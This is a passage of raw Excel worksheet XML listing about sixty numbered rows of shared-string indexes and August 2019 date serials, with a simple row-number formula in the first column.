    </row>
    <row r="12997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12997">
        <f t="shared" si="203"/>
        <v>12996</v>
      </c>
      <c r="B12997">
        <v>2996</v>
      </c>
      <c r="C12997" t="s">
        <v>19637</v>
      </c>
      <c r="D12997" s="1">
        <v>43702</v>
      </c>
      <c r="E12997" t="s">
        <v>22488</v>
      </c>
      <c r="F12997" t="s">
        <v>10526</v>
      </c>
      <c r="G12997" t="s">
        <v>23273</v>
      </c>
    </row>
    <row r="12998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12998">
        <f t="shared" si="203"/>
        <v>12997</v>
      </c>
      <c r="B12998">
        <v>2997</v>
      </c>
      <c r="C12998" t="s">
        <v>19637</v>
      </c>
      <c r="D12998" s="1">
        <v>43696</v>
      </c>
      <c r="E12998" t="s">
        <v>19643</v>
      </c>
      <c r="F12998" t="s">
        <v>10021</v>
      </c>
      <c r="G12998" t="s">
        <v>23274</v>
      </c>
    </row>
    <row r="12999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12999">
        <f t="shared" si="203"/>
        <v>12998</v>
      </c>
      <c r="B12999">
        <v>2998</v>
      </c>
      <c r="C12999" t="s">
        <v>19637</v>
      </c>
      <c r="D12999" s="1">
        <v>43701</v>
      </c>
      <c r="E12999" t="s">
        <v>19994</v>
      </c>
      <c r="F12999" t="s">
        <v>10021</v>
      </c>
    </row>
    <row r="13000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13000">
        <f t="shared" si="203"/>
        <v>12999</v>
      </c>
      <c r="B13000">
        <v>2999</v>
      </c>
      <c r="C13000" t="s">
        <v>19637</v>
      </c>
      <c r="D13000" s="1">
        <v>43679</v>
      </c>
      <c r="E13000" t="s">
        <v>19638</v>
      </c>
      <c r="F13000" t="s">
        <v>10021</v>
      </c>
      <c r="G13000" t="s">
        <v>23275</v>
      </c>
    </row>
    <row r="13001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13001">
        <f t="shared" si="203"/>
        <v>13000</v>
      </c>
      <c r="B13001">
        <v>3000</v>
      </c>
      <c r="C13001" t="s">
        <v>19637</v>
      </c>
      <c r="D13001" s="1">
        <v>43697</v>
      </c>
      <c r="F13001" t="s">
        <v>10526</v>
      </c>
      <c r="G13001" t="s">
        <v>23276</v>
      </c>
    </row>
    <row r="13002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13002">
        <f t="shared" si="203"/>
        <v>13001</v>
      </c>
      <c r="B13002">
        <v>3001</v>
      </c>
      <c r="C13002" t="s">
        <v>19637</v>
      </c>
      <c r="D13002" s="1">
        <v>43693</v>
      </c>
      <c r="E13002" t="s">
        <v>23277</v>
      </c>
      <c r="F13002" t="s">
        <v>10021</v>
      </c>
      <c r="G13002" t="s">
        <v>23278</v>
      </c>
    </row>
    <row r="13003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13003">
        <f t="shared" si="203"/>
        <v>13002</v>
      </c>
      <c r="B13003">
        <v>3002</v>
      </c>
      <c r="C13003" t="s">
        <v>19637</v>
      </c>
      <c r="D13003" s="1">
        <v>43698</v>
      </c>
      <c r="E13003" t="s">
        <v>19640</v>
      </c>
      <c r="F13003" t="s">
        <v>10021</v>
      </c>
      <c r="G13003" t="s">
        <v>23279</v>
      </c>
    </row>
    <row r="13004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13004">
        <f t="shared" si="203"/>
        <v>13003</v>
      </c>
      <c r="B13004">
        <v>3003</v>
      </c>
      <c r="C13004" t="s">
        <v>19637</v>
      </c>
      <c r="D13004" s="1">
        <v>43694</v>
      </c>
      <c r="F13004" t="s">
        <v>10526</v>
      </c>
      <c r="G13004" t="s">
        <v>23280</v>
      </c>
    </row>
    <row r="13005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13005">
        <f t="shared" si="203"/>
        <v>13004</v>
      </c>
      <c r="B13005">
        <v>3004</v>
      </c>
      <c r="C13005" t="s">
        <v>19637</v>
      </c>
      <c r="D13005" s="1">
        <v>43686</v>
      </c>
      <c r="E13005" t="s">
        <v>23281</v>
      </c>
      <c r="F13005" t="s">
        <v>9975</v>
      </c>
      <c r="G13005" t="s">
        <v>23282</v>
      </c>
    </row>
    <row r="13006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13006">
        <f t="shared" si="203"/>
        <v>13005</v>
      </c>
      <c r="B13006">
        <v>3005</v>
      </c>
      <c r="C13006" t="s">
        <v>19637</v>
      </c>
      <c r="D13006" s="1">
        <v>43706</v>
      </c>
      <c r="E13006" t="s">
        <v>19640</v>
      </c>
      <c r="F13006" t="s">
        <v>9975</v>
      </c>
      <c r="G13006" t="s">
        <v>23283</v>
      </c>
    </row>
    <row r="13007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13007">
        <f t="shared" si="203"/>
        <v>13006</v>
      </c>
      <c r="B13007">
        <v>3006</v>
      </c>
      <c r="C13007" t="s">
        <v>19637</v>
      </c>
      <c r="D13007" s="1">
        <v>43678</v>
      </c>
      <c r="E13007" t="s">
        <v>20707</v>
      </c>
      <c r="F13007" t="s">
        <v>10526</v>
      </c>
      <c r="G13007" t="s">
        <v>23284</v>
      </c>
    </row>
    <row r="13008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13008">
        <f t="shared" si="203"/>
        <v>13007</v>
      </c>
      <c r="B13008">
        <v>3007</v>
      </c>
      <c r="C13008" t="s">
        <v>19637</v>
      </c>
      <c r="D13008" s="1">
        <v>43702</v>
      </c>
      <c r="E13008" t="s">
        <v>19717</v>
      </c>
      <c r="F13008" t="s">
        <v>10526</v>
      </c>
      <c r="G13008" t="s">
        <v>23285</v>
      </c>
    </row>
    <row r="13009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13009">
        <f t="shared" si="203"/>
        <v>13008</v>
      </c>
      <c r="B13009">
        <v>3008</v>
      </c>
      <c r="C13009" t="s">
        <v>19637</v>
      </c>
      <c r="D13009" s="1">
        <v>43682</v>
      </c>
      <c r="E13009" t="s">
        <v>23286</v>
      </c>
      <c r="F13009" t="s">
        <v>9978</v>
      </c>
      <c r="G13009" t="s">
        <v>23287</v>
      </c>
    </row>
    <row r="13010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13010">
        <f t="shared" si="203"/>
        <v>13009</v>
      </c>
      <c r="B13010">
        <v>3009</v>
      </c>
      <c r="C13010" t="s">
        <v>19637</v>
      </c>
      <c r="D13010" s="1">
        <v>43698</v>
      </c>
      <c r="E13010" t="s">
        <v>20005</v>
      </c>
      <c r="F13010" t="s">
        <v>9975</v>
      </c>
      <c r="G13010" t="s">
        <v>23288</v>
      </c>
    </row>
    <row r="13011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13011">
        <f t="shared" si="203"/>
        <v>13010</v>
      </c>
      <c r="B13011">
        <v>3010</v>
      </c>
      <c r="C13011" t="s">
        <v>19637</v>
      </c>
      <c r="D13011" s="1">
        <v>43686</v>
      </c>
      <c r="E13011" t="s">
        <v>23289</v>
      </c>
      <c r="F13011" t="s">
        <v>10526</v>
      </c>
      <c r="G13011" t="s">
        <v>23290</v>
      </c>
    </row>
    <row r="13012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13012">
        <f t="shared" si="203"/>
        <v>13011</v>
      </c>
      <c r="B13012">
        <v>3011</v>
      </c>
      <c r="C13012" t="s">
        <v>19637</v>
      </c>
      <c r="D13012" s="1">
        <v>43697</v>
      </c>
      <c r="E13012" t="s">
        <v>19896</v>
      </c>
      <c r="F13012" t="s">
        <v>10021</v>
      </c>
      <c r="G13012" t="s">
        <v>23291</v>
      </c>
    </row>
    <row r="13013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13013">
        <f t="shared" si="203"/>
        <v>13012</v>
      </c>
      <c r="B13013">
        <v>3012</v>
      </c>
      <c r="C13013" t="s">
        <v>19637</v>
      </c>
      <c r="D13013" s="1">
        <v>43693</v>
      </c>
      <c r="E13013" t="s">
        <v>23292</v>
      </c>
      <c r="F13013" t="s">
        <v>10526</v>
      </c>
      <c r="G13013" t="s">
        <v>23293</v>
      </c>
    </row>
    <row r="13014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13014">
        <f t="shared" si="203"/>
        <v>13013</v>
      </c>
      <c r="B13014">
        <v>3013</v>
      </c>
      <c r="C13014" t="s">
        <v>19637</v>
      </c>
      <c r="D13014" s="1">
        <v>43680</v>
      </c>
      <c r="E13014" t="s">
        <v>22117</v>
      </c>
      <c r="F13014" t="s">
        <v>10526</v>
      </c>
      <c r="G13014" t="s">
        <v>23294</v>
      </c>
    </row>
    <row r="13015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13015">
        <f t="shared" si="203"/>
        <v>13014</v>
      </c>
      <c r="B13015">
        <v>3014</v>
      </c>
      <c r="C13015" t="s">
        <v>19637</v>
      </c>
      <c r="D13015" s="1">
        <v>43685</v>
      </c>
      <c r="E13015" t="s">
        <v>19690</v>
      </c>
      <c r="F13015" t="s">
        <v>9978</v>
      </c>
      <c r="G13015" t="s">
        <v>23295</v>
      </c>
    </row>
    <row r="13016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13016">
        <f t="shared" si="203"/>
        <v>13015</v>
      </c>
      <c r="B13016">
        <v>3015</v>
      </c>
      <c r="C13016" t="s">
        <v>19637</v>
      </c>
      <c r="D13016" s="1">
        <v>43698</v>
      </c>
      <c r="E13016" t="s">
        <v>21322</v>
      </c>
      <c r="F13016" t="s">
        <v>10021</v>
      </c>
      <c r="G13016" t="s">
        <v>23296</v>
      </c>
    </row>
    <row r="13017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13017">
        <f t="shared" si="203"/>
        <v>13016</v>
      </c>
      <c r="B13017">
        <v>3016</v>
      </c>
      <c r="C13017" t="s">
        <v>19637</v>
      </c>
      <c r="D13017" s="1">
        <v>43687</v>
      </c>
      <c r="E13017" t="s">
        <v>19668</v>
      </c>
      <c r="F13017" t="s">
        <v>9978</v>
      </c>
      <c r="G13017" t="s">
        <v>23297</v>
      </c>
    </row>
    <row r="13018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13018">
        <f t="shared" si="203"/>
        <v>13017</v>
      </c>
      <c r="B13018">
        <v>3017</v>
      </c>
      <c r="C13018" t="s">
        <v>19637</v>
      </c>
      <c r="D13018" s="1">
        <v>43699</v>
      </c>
      <c r="E13018" t="s">
        <v>19680</v>
      </c>
      <c r="F13018" t="s">
        <v>10021</v>
      </c>
      <c r="G13018" t="s">
        <v>23298</v>
      </c>
    </row>
    <row r="13019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13019">
        <f t="shared" si="203"/>
        <v>13018</v>
      </c>
      <c r="B13019">
        <v>3018</v>
      </c>
      <c r="C13019" t="s">
        <v>19637</v>
      </c>
      <c r="D13019" s="1">
        <v>43693</v>
      </c>
      <c r="E13019" t="s">
        <v>23299</v>
      </c>
      <c r="F13019" t="s">
        <v>10526</v>
      </c>
      <c r="G13019" t="s">
        <v>23300</v>
      </c>
    </row>
    <row r="13020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13020">
        <f t="shared" si="203"/>
        <v>13019</v>
      </c>
      <c r="B13020">
        <v>3019</v>
      </c>
      <c r="C13020" t="s">
        <v>19637</v>
      </c>
      <c r="D13020" s="1">
        <v>43691</v>
      </c>
      <c r="F13020" t="s">
        <v>10526</v>
      </c>
      <c r="G13020" t="s">
        <v>23301</v>
      </c>
    </row>
    <row r="13021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13021">
        <f t="shared" si="203"/>
        <v>13020</v>
      </c>
      <c r="B13021">
        <v>3020</v>
      </c>
      <c r="C13021" t="s">
        <v>19637</v>
      </c>
      <c r="D13021" s="1">
        <v>43701</v>
      </c>
      <c r="E13021" t="s">
        <v>19640</v>
      </c>
      <c r="F13021" t="s">
        <v>10021</v>
      </c>
      <c r="G13021" t="s">
        <v>23302</v>
      </c>
    </row>
    <row r="13022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13022">
        <f t="shared" si="203"/>
        <v>13021</v>
      </c>
      <c r="B13022">
        <v>3021</v>
      </c>
      <c r="C13022" t="s">
        <v>19637</v>
      </c>
      <c r="D13022" s="1">
        <v>43700</v>
      </c>
      <c r="E13022" t="s">
        <v>20220</v>
      </c>
      <c r="F13022" t="s">
        <v>10021</v>
      </c>
      <c r="G13022" t="s">
        <v>23303</v>
      </c>
    </row>
    <row r="13023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13023">
        <f t="shared" si="203"/>
        <v>13022</v>
      </c>
      <c r="B13023">
        <v>3022</v>
      </c>
      <c r="C13023" t="s">
        <v>19637</v>
      </c>
      <c r="D13023" s="1">
        <v>43681</v>
      </c>
      <c r="E13023" t="s">
        <v>19725</v>
      </c>
      <c r="F13023" t="s">
        <v>9978</v>
      </c>
      <c r="G13023" t="s">
        <v>23304</v>
      </c>
    </row>
    <row r="13024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13024">
        <f t="shared" si="203"/>
        <v>13023</v>
      </c>
      <c r="B13024">
        <v>3023</v>
      </c>
      <c r="C13024" t="s">
        <v>19637</v>
      </c>
      <c r="D13024" s="1">
        <v>43689</v>
      </c>
      <c r="F13024" t="s">
        <v>10526</v>
      </c>
      <c r="G13024" t="s">
        <v>23305</v>
      </c>
    </row>
    <row r="13025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13025">
        <f t="shared" si="203"/>
        <v>13024</v>
      </c>
      <c r="B13025">
        <v>3024</v>
      </c>
      <c r="C13025" t="s">
        <v>19637</v>
      </c>
      <c r="D13025" s="1">
        <v>43679</v>
      </c>
      <c r="E13025" t="s">
        <v>19640</v>
      </c>
      <c r="F13025" t="s">
        <v>9975</v>
      </c>
      <c r="G13025" t="s">
        <v>23306</v>
      </c>
    </row>
    <row r="13026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13026">
        <f t="shared" si="203"/>
        <v>13025</v>
      </c>
      <c r="B13026">
        <v>3025</v>
      </c>
      <c r="C13026" t="s">
        <v>19637</v>
      </c>
      <c r="D13026" s="1">
        <v>43698</v>
      </c>
      <c r="E13026" t="s">
        <v>19640</v>
      </c>
      <c r="F13026" t="s">
        <v>10021</v>
      </c>
      <c r="G13026" t="s">
        <v>23307</v>
      </c>
    </row>
    <row r="13027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13027">
        <f t="shared" si="203"/>
        <v>13026</v>
      </c>
      <c r="B13027">
        <v>3026</v>
      </c>
      <c r="C13027" t="s">
        <v>19637</v>
      </c>
      <c r="D13027" s="1">
        <v>43701</v>
      </c>
      <c r="E13027" t="s">
        <v>19640</v>
      </c>
      <c r="F13027" t="s">
        <v>9975</v>
      </c>
      <c r="G13027" t="s">
        <v>23308</v>
      </c>
    </row>
    <row r="13028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13028">
        <f t="shared" si="203"/>
        <v>13027</v>
      </c>
      <c r="B13028">
        <v>3027</v>
      </c>
      <c r="C13028" t="s">
        <v>19637</v>
      </c>
      <c r="D13028" s="1">
        <v>43699</v>
      </c>
      <c r="F13028" t="s">
        <v>10526</v>
      </c>
      <c r="G13028" t="s">
        <v>23309</v>
      </c>
    </row>
    <row r="13029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13029">
        <f t="shared" si="203"/>
        <v>13028</v>
      </c>
      <c r="B13029">
        <v>3028</v>
      </c>
      <c r="C13029" t="s">
        <v>19637</v>
      </c>
      <c r="D13029" s="1">
        <v>43686</v>
      </c>
      <c r="F13029" t="s">
        <v>10526</v>
      </c>
      <c r="G13029" t="s">
        <v>23310</v>
      </c>
    </row>
    <row r="13030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13030">
        <f t="shared" si="203"/>
        <v>13029</v>
      </c>
      <c r="B13030">
        <v>3029</v>
      </c>
      <c r="C13030" t="s">
        <v>19637</v>
      </c>
      <c r="D13030" s="1">
        <v>43680</v>
      </c>
      <c r="F13030" t="s">
        <v>9978</v>
      </c>
      <c r="G13030" t="s">
        <v>23311</v>
      </c>
    </row>
    <row r="13031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13031">
        <f t="shared" si="203"/>
        <v>13030</v>
      </c>
      <c r="B13031">
        <v>3030</v>
      </c>
      <c r="C13031" t="s">
        <v>19637</v>
      </c>
      <c r="D13031" s="1">
        <v>43704</v>
      </c>
      <c r="E13031" t="s">
        <v>19680</v>
      </c>
      <c r="F13031" t="s">
        <v>10021</v>
      </c>
      <c r="G13031" t="s">
        <v>23312</v>
      </c>
    </row>
    <row r="13032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13032">
        <f t="shared" si="203"/>
        <v>13031</v>
      </c>
      <c r="B13032">
        <v>3031</v>
      </c>
      <c r="C13032" t="s">
        <v>19637</v>
      </c>
      <c r="D13032" s="1">
        <v>43681</v>
      </c>
      <c r="E13032" t="s">
        <v>23181</v>
      </c>
      <c r="F13032" t="s">
        <v>10021</v>
      </c>
      <c r="G13032" t="s">
        <v>23313</v>
      </c>
    </row>
    <row r="13033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13033">
        <f t="shared" si="203"/>
        <v>13032</v>
      </c>
      <c r="B13033">
        <v>3032</v>
      </c>
      <c r="C13033" t="s">
        <v>19637</v>
      </c>
      <c r="D13033" s="1">
        <v>43699</v>
      </c>
      <c r="E13033" t="s">
        <v>19879</v>
      </c>
      <c r="F13033" t="s">
        <v>10021</v>
      </c>
      <c r="G13033" t="s">
        <v>23314</v>
      </c>
    </row>
    <row r="13034" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13034">
        <f t="shared" si="203"/>
        <v>13033</v>
      </c>
      <c r="B13034">
        <v>3033</v>
      </c>
      <c r="C13034" t="s">
        <v>19637</v>
      </c>
      <c r="D13034" s="1">
        <v>43681</v>
      </c>
      <c r="F13034" t="s">
        <v>10526</v>
      </c>
      <c r="G13034" t="s">
        <v>23315</v>
      </c>
    </row>
    <row r="13035" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13035">
        <f t="shared" si="203"/>
        <v>13034</v>
      </c>
      <c r="B13035">
        <v>3034</v>
      </c>
      <c r="C13035" t="s">
        <v>19637</v>
      </c>
      <c r="D13035" s="1">
        <v>43706</v>
      </c>
      <c r="E13035" t="s">
        <v>23316</v>
      </c>
      <c r="F13035" t="s">
        <v>10021</v>
      </c>
      <c r="G13035" t="s">
        <v>23317</v>
      </c>
    </row>
    <row r="13036" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13036">
        <f t="shared" si="203"/>
        <v>13035</v>
      </c>
      <c r="B13036">
        <v>3035</v>
      </c>
      <c r="C13036" t="s">
        <v>19637</v>
      </c>
      <c r="D13036" s="1">
        <v>43696</v>
      </c>
      <c r="E13036" t="s">
        <v>23318</v>
      </c>
      <c r="F13036" t="s">
        <v>9978</v>
      </c>
      <c r="G13036" t="s">
        <v>23319</v>
      </c>
    </row>
    <row r="13037" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13037">
        <f t="shared" si="203"/>
        <v>13036</v>
      </c>
      <c r="B13037">
        <v>3036</v>
      </c>
      <c r="C13037" t="s">
        <v>19637</v>
      </c>
      <c r="D13037" s="1">
        <v>43684</v>
      </c>
      <c r="E13037" t="s">
        <v>23224</v>
      </c>
      <c r="F13037" t="s">
        <v>10526</v>
      </c>
      <c r="G13037" t="s">
        <v>23320</v>
      </c>
    </row>
    <row r="13038" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13038">
        <f t="shared" si="203"/>
        <v>13037</v>
      </c>
      <c r="B13038">
        <v>3037</v>
      </c>
      <c r="C13038" t="s">
        <v>19637</v>
      </c>
      <c r="D13038" s="1">
        <v>43689</v>
      </c>
      <c r="E13038" t="s">
        <v>22459</v>
      </c>
      <c r="F13038" t="s">
        <v>10526</v>
      </c>
      <c r="G13038" t="s">
        <v>23321</v>
      </c>
    </row>
    <row r="13039" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13039">
        <f t="shared" si="203"/>
        <v>13038</v>
      </c>
      <c r="B13039">
        <v>3038</v>
      </c>
      <c r="C13039" t="s">
        <v>19637</v>
      </c>
      <c r="D13039" s="1">
        <v>43704</v>
      </c>
      <c r="E13039" t="s">
        <v>19640</v>
      </c>
      <c r="F13039" t="s">
        <v>10021</v>
      </c>
      <c r="G13039" t="s">
        <v>23322</v>
      </c>
    </row>
    <row r="13040" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13040">
        <f t="shared" si="203"/>
        <v>13039</v>
      </c>
      <c r="B13040">
        <v>3039</v>
      </c>
      <c r="C13040" t="s">
        <v>19637</v>
      </c>
      <c r="D13040" s="1">
        <v>43690</v>
      </c>
      <c r="E13040" t="s">
        <v>20684</v>
      </c>
      <c r="F13040" t="s">
        <v>10021</v>
      </c>
      <c r="G13040" t="s">
        <v>23323</v>
      </c>
    </row>
    <row r="13041" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13041">
        <f t="shared" si="203"/>
        <v>13040</v>
      </c>
      <c r="B13041">
        <v>3040</v>
      </c>
      <c r="C13041" t="s">
        <v>19637</v>
      </c>
      <c r="D13041" s="1">
        <v>43687</v>
      </c>
      <c r="E13041" t="s">
        <v>20813</v>
      </c>
      <c r="F13041" t="s">
        <v>10526</v>
      </c>
      <c r="G13041" t="s">
        <v>23324</v>
      </c>
    </row>
    <row r="13042" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13042">
        <f t="shared" si="203"/>
        <v>13041</v>
      </c>
      <c r="B13042">
        <v>3041</v>
      </c>
      <c r="C13042" t="s">
        <v>19637</v>
      </c>
      <c r="D13042" s="1">
        <v>43707</v>
      </c>
      <c r="E13042" t="s">
        <v>23325</v>
      </c>
      <c r="F13042" t="s">
        <v>10526</v>
      </c>
      <c r="G13042" t="s">
        <v>23326</v>
      </c>
    </row>
    <row r="13043" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13043">
        <f t="shared" si="203"/>
        <v>13042</v>
      </c>
      <c r="B13043">
        <v>3042</v>
      </c>
      <c r="C13043" t="s">
        <v>19637</v>
      </c>
      <c r="D13043" s="1">
        <v>43680</v>
      </c>
      <c r="E13043" t="s">
        <v>19796</v>
      </c>
      <c r="F13043" t="s">
        <v>10021</v>
      </c>
      <c r="G13043" t="s">
        <v>23327</v>
      </c>
    </row>
    <row r="13044" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13044">
        <f t="shared" si="203"/>
        <v>13043</v>
      </c>
      <c r="B13044">
        <v>3043</v>
      </c>
      <c r="C13044" t="s">
        <v>19637</v>
      </c>
      <c r="D13044" s="1">
        <v>43689</v>
      </c>
      <c r="F13044" t="s">
        <v>10526</v>
      </c>
      <c r="G13044" t="s">
        <v>23328</v>
      </c>
    </row>
    <row r="13045" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13045">
        <f t="shared" si="203"/>
        <v>13044</v>
      </c>
      <c r="B13045">
        <v>3044</v>
      </c>
      <c r="C13045" t="s">
        <v>19637</v>
      </c>
      <c r="D13045" s="1">
        <v>43693</v>
      </c>
      <c r="E13045" t="s">
        <v>19643</v>
      </c>
      <c r="F13045" t="s">
        <v>10021</v>
      </c>
      <c r="G13045" t="s">
        <v>23329</v>
      </c>
    </row>
    <row r="13046" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13046">
        <f t="shared" si="203"/>
        <v>13045</v>
      </c>
      <c r="B13046">
        <v>3045</v>
      </c>
      <c r="C13046" t="s">
        <v>19637</v>
      </c>
      <c r="D13046" s="1">
        <v>43690</v>
      </c>
      <c r="E13046" t="s">
        <v>19750</v>
      </c>
      <c r="F13046" t="s">
        <v>9978</v>
      </c>
      <c r="G13046" t="s">
        <v>23330</v>
      </c>
    </row>
    <row r="13047" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13047">
        <f t="shared" si="203"/>
        <v>13046</v>
      </c>
      <c r="B13047">
        <v>3046</v>
      </c>
      <c r="C13047" t="s">
        <v>19637</v>
      </c>
      <c r="D13047" s="1">
        <v>43693</v>
      </c>
      <c r="E13047" t="s">
        <v>22488</v>
      </c>
      <c r="F13047" t="s">
        <v>10526</v>
      </c>
      <c r="G13047" t="s">
        <v>23331</v>
      </c>
    </row>
    <row r="13048" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13048">
        <f t="shared" si="203"/>
        <v>13047</v>
      </c>
      <c r="B13048">
        <v>3047</v>
      </c>
      <c r="C13048" t="s">
        <v>19637</v>
      </c>
      <c r="D13048" s="1">
        <v>43706</v>
      </c>
      <c r="F13048" t="s">
        <v>10526</v>
      </c>
      <c r="G13048" t="s">
        <v>23332</v>
      </c>
    </row>
    <row r="13049" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13049">
        <f t="shared" si="203"/>
        <v>13048</v>
      </c>
      <c r="B13049">
        <v>3048</v>
      </c>
      <c r="C13049" t="s">
        <v>19637</v>
      </c>
      <c r="D13049" s="1">
        <v>43699</v>
      </c>
      <c r="E13049" t="s">
        <v>22721</v>
      </c>
      <c r="F13049" t="s">
        <v>10021</v>
      </c>
      <c r="G13049" t="s">
        <v>23333</v>
      </c>
    </row>
    <row r="13050" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13050">
        <f t="shared" si="203"/>
        <v>13049</v>
      </c>
      <c r="B13050">
        <v>3049</v>
      </c>
      <c r="C13050" t="s">
        <v>19637</v>
      </c>
      <c r="D13050" s="1">
        <v>43686</v>
      </c>
      <c r="E13050" t="s">
        <v>19640</v>
      </c>
      <c r="F13050" t="s">
        <v>10021</v>
      </c>
      <c r="G13050" t="s">
        <v>23334</v>
      </c>
    </row>
    <row r="13051" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13051">
        <f t="shared" si="203"/>
        <v>13050</v>
      </c>
      <c r="B13051">
        <v>3050</v>
      </c>
      <c r="C13051" t="s">
        <v>19637</v>
      </c>
      <c r="D13051" s="1">
        <v>43699</v>
      </c>
      <c r="E13051" t="s">
        <v>23335</v>
      </c>
      <c r="F13051" t="s">
        <v>9975</v>
      </c>
      <c r="G13051" t="s">
        <v>23336</v>
      </c>
    </row>
    <row r="13052" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13052">
        <f t="shared" si="203"/>
        <v>13051</v>
      </c>
      <c r="B13052">
        <v>3051</v>
      </c>
      <c r="C13052" t="s">
        <v>19637</v>
      </c>
      <c r="D13052" s="1">
        <v>43683</v>
      </c>
      <c r="F13052" t="s">
        <v>10526</v>
      </c>
      <c r="G13052" t="s">
        <v>23337</v>
      </c>
    </row>
    <row r="13053" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13053">
        <f t="shared" si="203"/>
        <v>13052</v>
      </c>
      <c r="B13053">
        <v>3052</v>
      </c>
      <c r="C13053" t="s">
        <v>19637</v>
      </c>
      <c r="D13053" s="1">
        <v>43684</v>
      </c>
      <c r="E13053" t="s">
        <v>19896</v>
      </c>
      <c r="F13053" t="s">
        <v>10021</v>
      </c>
      <c r="G13053" t="s">
        <v>23338</v>
      </c>
    </row>
    <row r="13054" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13054">
        <f t="shared" si="203"/>
        <v>13053</v>
      </c>
      <c r="B13054">
        <v>3053</v>
      </c>
      <c r="C13054" t="s">
        <v>19637</v>
      </c>
      <c r="D13054" s="1">
        <v>43696</v>
      </c>
      <c r="F13054" t="s">
        <v>10526</v>
      </c>
      <c r="G13054" t="s">
        <v>23339</v>
      </c>
    </row>
    <row r="13055" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13055">
        <f t="shared" si="203"/>
        <v>13054</v>
      </c>
      <c r="B13055">
        <v>3054</v>
      </c>
      <c r="C13055" t="s">
        <v>19637</v>
      </c>
      <c r="D13055" s="1">
        <v>43678</v>
      </c>
      <c r="F13055" t="s">
        <v>10526</v>
      </c>
      <c r="G13055" t="s">
        <v>23340</v>
      </c>
    </row>
    <row r="13056" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13056">
        <f t="shared" si="203"/>
        <v>13055</v>
      </c>
      <c r="B13056">
        <v>3055</v>
      </c>
      <c r="C13056" t="s">
        <v>19637</v>
      </c>
      <c r="D13056" s="1">
        <v>43691</v>
      </c>
      <c r="E13056" t="s">
        <v>20187</v>
      </c>
      <c r="F13056" t="s">
        <v>9975</v>
      </c>
      <c r="G13056" t="s">
        <v>23341</v>
      </c>
    </row>
    <row r="13057" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13057">
        <f t="shared" si="203"/>
        <v>13056</v>
      </c>
      <c r="B13057">
        <v>3056</v>
      </c>
      <c r="C13057" t="s">
        <v>19637</v>
      </c>
      <c r="D13057" s="1">
        <v>43681</v>
      </c>
      <c r="E13057" t="s">
        <v>19982</v>
      </c>
      <c r="F13057" t="s">
        <v>9978</v>
      </c>
      <c r="G13057" t="s">
        <v>23342</v>
      </c>
    </row>
    <row r="13058" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13058">
        <f t="shared" si="203"/>
        <v>13057</v>
      </c>
      <c r="B13058">
        <v>3057</v>
      </c>
      <c r="C13058" t="s">
        <v>19637</v>
      </c>
      <c r="D13058" s="1">
        <v>43685</v>
      </c>
      <c r="E13058" t="s">
        <v>23343</v>
      </c>
      <c r="F13058" t="s">
        <v>9975</v>
      </c>
      <c r="G13058" t="s">
        <v>23344</v>
      </c>
    </row>
    <row r="13059" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13059">
        <f t="shared" ref="A13059:A13122" si="204">+ROW(A13058)</f>
        <v>13058</v>
      </c>
      <c r="B13059">
        <v>3058</v>
      </c>
      <c r="C13059" t="s">
        <v>19637</v>
      </c>
